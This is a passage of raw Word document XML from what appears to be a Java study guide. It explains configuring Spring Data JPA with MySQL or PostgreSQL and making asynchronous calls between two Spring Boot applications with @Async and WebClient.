          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Maven): You need to add the database driver dependency in your pom.xml file. For example, for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D0C7B"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54A48F64"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481DDED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spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA02EB"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5E4EC90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0F834C0B"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mysql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08F97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mysql-connector-java&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62564DC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23F28A1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For PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA829B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1054FC0B"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755EC11"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spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E1940"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1D2B744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2717D0CF"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org.postgresql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B25DF4"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postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CB41CA"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40A7CEA8"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onfigure Database Connection in application.properties or application.yml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need to specify your database connection details in application.properties or application.yml file. Example configuration for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFC8A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rl=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B10B9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spring.datasource.username=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16EC7D"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password=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B38D3"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693FC014"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driver-class-name=com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8BFC4"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jpa.database-platform=org.hibernate.dialect.MySQL5Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1AFC0"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jpa.show-sql=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE021A8"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D77F9C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For PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB54524"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rl=jdbc:postgresql://localhost:5432/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2A62BA"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sername=postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A3BBB"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password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D725DAF"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0780D9DF"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driver-class-name=org.postgresql.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7532E493"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jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77CDD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reate Entity Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need to create entity classes annotated with @Entity to represent database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FB2DA"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6A1D2C8F"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43623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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B798C" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7912D81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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F890D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neratedValue(strategy = GenerationType.IDENTITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DA7C9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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE9EAC4" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E0599D"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDAB1FB"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String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EAAAC5" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA6376F"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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A97E6F"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2642B6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reate Repository Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Data JPA provides a JpaRepository or CrudRepository for data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E13E3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471DC317"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD218C7"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D78D0"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Custom queries can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE09A54"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C8D6F64"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e the Repository in a Service Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can inject the repository in your service class and use it to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7384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7F37CE2A"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED2C8D"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2EA7A" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117A0837"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1199DACF"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566BECD9" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056A1CC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List&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE868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employeeRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC0EDC"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E32E6A3" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C6D774"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Employee getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044447A0"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employeeRepository.findById(id).orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C675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21965B5D" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203BCCF0"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Employee saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3131D7F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employeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60373B8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41F49718"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F554BC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lastRenderedPageBreak/>
        <w:t>Run the Spring Boot Application</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you run the Spring Boot application, it will automatically connect to the configured database, create tables (if they don't exist), and perform CRUD operations using the JPA repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66483BB9"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How JPA Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2817C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ntity</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The entity class represents a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2924F287"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Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The repository interface allows interaction with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978F897"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ervice Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The service layer contains business logic and uses repositories to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E580A4"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By using JPA with Spring Boot, you can easily integrate any relational database and manage database operations with less code, leveraging the power of ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614AFE3E" w14:textId="7A73F8D3"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DACD4FE">
          <v:rect id="_x0000_i2685" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEFE1C5" w14:textId="0A6B3973" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00C425AB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="650" w:name="_Toc196308130"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to communicate between two spring boot applications using asynchronous calls</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="650"/>
    </w:p>
    <w:p w14:paraId="269B489C" w14:textId="36302D79" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9"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To enable asynchronous communication between two Spring Boot applications, you can use several approaches, such as HTTP-based communication (using REST APIs) combined with asynchronous methods or messaging queues like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RabbitMQ</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Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D5ADF"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Approach 1: Asynchronous Communication via REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3DA7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You can achieve asynchronous communication between two Spring Boot applications using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>REST APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous HTTP requests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's how you can do it step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14706BE2"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Enable Asynchronous Support in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E78B7B"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First, enable asynchronous processing in Spring Boot by adding the @EnableAsync annotation in the main application class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DEB803"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23462C20"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ableAsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561783B7"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Application {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24F73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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DF7B7"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pringApplication.run(Application.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684FA6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688045C"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1B1C1251"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Define Asynchronous Method in the Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF77F8D"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the service class, you can define methods that execute asynchronously using @Async. This allows the method to run in a separate thread, ensuring the request doesn't block the main thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E4FAB3"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scheduling.annotation.Async;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46725A87"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07BB0B"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java.util.concurrent.CompletableFuture;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F7235" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62ED3398"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E12DFA"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MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ADAEE8" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371BC104"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sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC87BE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CompletableFuture&lt;String&gt; asyncMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46821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Simulate a delay (e.g., a time-consuming task)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F9B481"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E6DEA"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hread.sleep(5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B7490"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785387E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printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790E58F"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4CC36D8C"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CompletableFuture.completedFuture("Completed asynchronously");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E827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5EEF79E0"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24236922"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Call the Asynchronous Method in the Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D850EA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the controller, you can call this asynchronous method. Spring will execute the method in a separate thread, so the request can return immediately without waiting for the asynchronous method to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748FD33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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6C7CF"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C408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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953EC8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java.util.concurrent.ExecutionException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A507ED" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2DDAA0"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43290990"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860A033" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEE718F"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4F875B28"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MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C0F011" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C66A30"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tMapping("/startTask")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E454C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ring startTask() throws ExecutionException, InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22954FFB"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CompletableFuture&lt;String&gt; response = myService.asyncMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A1A10"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Task started asynchronously!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36B56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0CD9DEE1"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1D480288"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4. Make Asynchronous REST Calls to Another Spring Boot Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E95D5FF"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a scenario where one Spring Boot application needs to call another, you can make the REST calls asynchronously using a RestTemplate or WebClient. WebClient is preferred for non-blocking, asynchronous calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F997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 of making an asynchronous REST call from Application 1 to Application 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F02201"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55792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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10157927"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web.reactive.function.client.WebClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5988C"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java.util.concurrent.CountDownLatch;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A025B" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D49528B"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F0978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RestClientService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F11731" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741378C8"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2A0D838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WebClient.Builder webClientBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B70B0" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119EF4F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ring callAnotherAppAsynchronously() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2795B3"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CountDownLatch latch = new CountDownLatch(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA6A6D3"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435AF2B3"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Create an asynchronous call to another Spring Boot app's REST API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131D953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ebClientBuilder.baseUrl("http://localhost:8081") // Application 2 URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2572A"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uild()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C06CD9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t()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C09B98D"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uri("/someEndpoint") // Endpoint in Application 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2029B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rieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC527A"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odyToMono(String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24F0BB"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doFinally(signalType -&gt; latch.countDown()) // When the call finishes, count down the latch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D340AA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ubscribe(); // Start the async call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A7965" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5FFCC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atch.await(); // Wait for the async operation to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C70ECC0"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Call completed!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13378421"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53D49B90"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1E60B849"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5. Controller to Trigger Asynchronous Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8A7B3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expose an endpoint that triggers the asynchronous call to the other application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA6F89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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C082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AsyncController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF2BDA2" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D619911"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4439D0E8"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RestClientService restClientService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791022CE" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
